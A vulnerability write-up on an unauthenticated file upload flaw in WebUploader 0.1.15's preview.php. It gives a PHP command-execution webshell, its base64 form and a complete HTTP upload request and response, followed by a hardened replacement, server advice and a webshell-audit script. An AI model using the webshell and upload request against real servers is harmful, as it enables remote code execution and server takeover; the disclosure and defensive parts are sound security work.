# webuploader-v-0.1.15 component has an arbitrary file upload vulnerability (unauthenticated)

#### Summary: The Baidu WebUploader component has a file upload vulnerability. The upload page of the WebUploader component does not filter the file type or file extension strictly enough, so an attacker can upload a script file directly, or after a trivial bypass of the restriction, execute system commands and take control of the web server.

#### server/preview.php
```
if (preg_match("#^data:image/(\w+);base64,(.*)$#", $src, $matches)) {

    $previewUrl = sprintf(
        "%s://%s%s",
        isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] != 'off' ? 'https' : 'http',
        $_SERVER['HTTP_HOST'],
        $_SERVER['REQUEST_URI']
    );
    $previewUrl = str_replace("preview.php", "", $previewUrl);


    $base64 = $matches[2];
    $type = $matches[1];
    if ($type === 'jpeg') {
        $type = 'jpg';
    }

    $filename = md5($base64).".$type";
    $filePath = $DIR.DIRECTORY_SEPARATOR.$filename;

    if (file_exists($filePath)) {
        die('{"jsonrpc" : "2.0", "result" : "'.$previewUrl.'preview/'.$filename.'", "id" : "id"}');
    } else {
        $data = base64_decode($base64);
        file_put_contents($filePath, $data);
        die('{"jsonrpc" : "2.0", "result" : "'.$previewUrl.'preview/'.$filename.'", "id" : "id"}');
    }
```
## 0x00 python usage
`python exp.py http://192.168.2.18/webuploader-0.1.15-Demo/server/preview.php`

![](./webuploader.jpg)

#### php_webshell

```
<?php
    if(isset($_REQUEST['cmd'])){
            echo "<pre>";
            $cmd = ($_REQUEST['cmd']);
            system($cmd);
            echo "</pre>";
            die;
    }
    phpinfo();
?>
```

#### base64 encode

```
PD9waHANCiAgICBpZihpc3NldCgkX1JFUVVFU1RbJ2NtZCddKSl7DQogICAgICAgICAgICBlY2hvICI8cHJlPiI7DQogICAgICAgICAgICAkY21kID0gKCRfUkVRVUVTVFsnY21kJ10pOw0KICAgICAgICAgICAgc3lzdGVtKCRjbWQpOw0KICAgICAgICAgICAgZWNobyAiPC9wcmU+IjsNCiAgICAgICAgICAgIGRpZTsNCiAgICB9DQogICAgcGhwaW5mbygpOw0KPz4=
```

## 0x01 POST upload php webshell

`http://192.168.2.18/webuploader-0.1.15-Demo/server/preview.php`

![](./burpsuite.jpg)

#### BurpSuite Requests
```
POST /webuploader-0.1.15-Demo/server/preview.php HTTP/1.1
Host: 192.168.2.18
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 298
X-Forwarded-For: 127.0.0.1
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

data:image/php;base64,PD9waHANCiAgICBpZihpc3NldCgkX1JFUVVFU1RbJ2NtZCddKSl7DQogICAgICAgICAgICBlY2hvICI8cHJlPiI7DQogICAgICAgICAgICAkY21kID0gKCRfUkVRVUVTVFsnY21kJ10pOw0KICAgICAgICAgICAgc3lzdGVtKCRjbWQpOw0KICAgICAgICAgICAgZWNobyAiPC9wcmU+IjsNCiAgICAgICAgICAgIGRpZTsNCiAgICB9DQogICAgcGhwaW5mbygpOw0KPz4=

```
#### BurpSuite Response
```
HTTP/1.1 200 OK
Date: Fri, 06 Sep 2019 05:40:48 GMT
Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a
X-Powered-By: PHP/5.5.9
Connection: close
Content-Type: text/html
Content-Length: 142

{"jsonrpc" : "2.0", "result" : "http://192.168.2.18/webuploader-0.1.15-Demo/server/preview/fe8db86134e6505da6f3c4a112b0bad7.php", "id" : "id"}
```

#### webshell
`http://192.168.2.18/webuploader-0.1.15-Demo/server/preview/fe8db86134e6505da6f3c4a112b0bad7.php`

![](./phpinfo.jpg)

![](./cmd.jpg)

### References

https://github.com/teambition/webuploader/releases

https://www.cnvd.org.cn/flaw/show/CNVD-2018-26054

Payload from 圈子
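The root cause in `server/preview.php` is that the regex `^data:image/(\w+);base64,` accepts any run of word characters as the image type and then uses that value verbatim as the extension of the file written to disk, so `data:image/php;base64,...` becomes `<md5>.php` inside a web-served directory. The following is an added example, not code from the WebUploader project: a hardened replacement for that branch that allow-lists the type, decodes in strict mode, verifies the decoded bytes really parse as an image of the declared type, and derives the filename only from the content hash and the allow-listed extension. It assumes `$src` and `$DIR` are set exactly as in the original file; the 2 MiB size cap, the `reject()` helper and the JSON error shape are my assumptions.

```php
<?php
// Added example (not part of the original WebUploader code): a hardened
// replacement for the preview.php branch shown above. Assumes $src and $DIR
// are set as in the original file.

// Only these data-URL media types are accepted, and each maps to a fixed
// extension. "php" or any other arbitrary \w+ value can no longer become
// the extension of the written file.
$allowedTypes = array(
    'jpeg' => 'jpg',
    'jpg'  => 'jpg',
    'png'  => 'png',
    'gif'  => 'gif',
);

// Expected IMAGETYPE_* constant per extension, used to confirm that the
// decoded bytes are an image of the declared type and not a script body.
$expectedImageType = array(
    'jpg' => IMAGETYPE_JPEG,
    'png' => IMAGETYPE_PNG,
    'gif' => IMAGETYPE_GIF,
);

// Assumed helper: answer with a JSON-RPC style error and stop.
function reject($message) {
    header('Content-Type: application/json');
    http_response_code(400);
    die(json_encode(array('jsonrpc' => '2.0', 'error' => $message, 'id' => 'id')));
}

// The regex now names the accepted types instead of matching \w+, and only
// allows base64 alphabet characters in the payload.
if (!preg_match('#^data:image/(jpeg|jpg|png|gif);base64,([A-Za-z0-9+/=]+)$#', $src, $matches)) {
    reject('unsupported preview data');
}

$type   = $allowedTypes[strtolower($matches[1])];
$base64 = $matches[2];

// Strict decoding: reject input that is not valid base64 at all.
$data = base64_decode($base64, true);
if ($data === false || strlen($data) === 0) {
    reject('invalid base64 payload');
}

// Size cap (assumption: 2 MiB is plenty for a thumbnail preview).
if (strlen($data) > 2 * 1024 * 1024) {
    reject('preview too large');
}

// Content check: getimagesizefromstring() parses the image header and
// reports the detected IMAGETYPE_*; a PHP script body fails this test.
$info = @getimagesizefromstring($data);
if ($info === false || $info[2] !== $expectedImageType[$type]) {
    reject('payload is not a ' . $type . ' image');
}

// The filename is built from the content hash and the allow-listed
// extension only; nothing attacker-controlled reaches the path.
$filename = md5($base64) . '.' . $type;
$filePath = $DIR . DIRECTORY_SEPARATOR . $filename;

if (!file_exists($filePath)) {
    file_put_contents($filePath, $data);
}

$previewUrl = sprintf(
    '%s://%s%s',
    isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off' ? 'https' : 'http',
    $_SERVER['HTTP_HOST'],
    $_SERVER['REQUEST_URI']
);
$previewUrl = str_replace('preview.php', '', $previewUrl);

header('Content-Type: application/json');
die(json_encode(array(
    'jsonrpc' => '2.0',
    'result'  => $previewUrl . 'preview/' . $filename,
    'id'      => 'id',
)));
```

Input validation alone is a single layer: the `preview/` directory should also be served with script execution disabled in the web server configuration (under mod_php a `php_flag engine off` for that directory; with FastCGI setups such as the mod_fcgid one in the response above, not mapping the PHP handler for that path), so that a future validation bypass still cannot turn an upload into code execution.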
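A successful upload leaves a file named `<md5>.<type>` in `server/preview/`, as the response above shows, and nothing in the vulnerable code removes it afterwards. The following is an added example, not part of this repository, of a small PHP command-line check an incident responder can run against that directory to find files that could not have come from a legitimate image preview: a non-image extension, content that does not parse as an image, or a PHP open tag anywhere in the file. The directory path argument and the extension allow-list are assumptions to adapt to the deployment.

```php
<?php
// Added example (not part of the original repository): audit a WebUploader
// "preview" directory for files that a correctly filtered preview.php would
// never have written. Usage (the path is an assumption, adapt it):
//   php audit_preview.php /var/www/html/webuploader-0.1.15-Demo/server/preview

// Extensions a correctly filtered preview.php would ever produce.
$allowedExt = array('jpg', 'png', 'gif');

function auditPreviewDir($dir, array $allowedExt) {
    if (!is_dir($dir)) {
        throw new RuntimeException("not a directory: $dir");
    }
    $findings = array();
    foreach (scandir($dir) as $name) {
        if ($name === '.' || $name === '..') {
            continue;
        }
        $path = $dir . DIRECTORY_SEPARATOR . $name;
        if (!is_file($path)) {
            continue;
        }

        $ext     = strtolower(pathinfo($name, PATHINFO_EXTENSION));
        $reasons = array();

        // .php, .phtml or any other non-image extension should never exist here.
        if (!in_array($ext, $allowedExt, true)) {
            $reasons[] = "non-image extension .$ext";
        }

        // Content check: a real preview is a parseable image regardless of its name.
        if (@getimagesize($path) === false) {
            $reasons[] = 'content is not a parseable image';
        }

        // A PHP open tag anywhere in the file is a strong web shell indicator,
        // including "polyglot" files that still parse as an image.
        $content = file_get_contents($path);
        if ($content !== false && stripos($content, '<?php') !== false) {
            $reasons[] = 'contains a PHP open tag';
        }

        if (count($reasons) > 0) {
            $findings[$name] = array(
                'mtime'   => date('c', filemtime($path)),
                'size'    => filesize($path),
                'reasons' => $reasons,
            );
        }
    }
    return $findings;
}

$dir      = isset($argv[1]) ? $argv[1] : __DIR__ . DIRECTORY_SEPARATOR . 'preview';
$findings = auditPreviewDir($dir, $allowedExt);
if (count($findings) === 0) {
    echo "no suspicious files in $dir", PHP_EOL;
}
foreach ($findings as $name => $f) {
    printf("%s  mtime=%s size=%d  %s%s",
        $name, $f['mtime'], $f['size'], implode('; ', $f['reasons']), PHP_EOL);
}
```

The `mtime` of each finding is the pivot for the rest of the investigation: the matching `POST /webuploader-0.1.15-Demo/server/preview.php` entry in the web server access log at that time gives the source address, and any later `GET` of the reported `preview/<md5>.php` path (with or without a `cmd` parameter) shows whether the file was actually used.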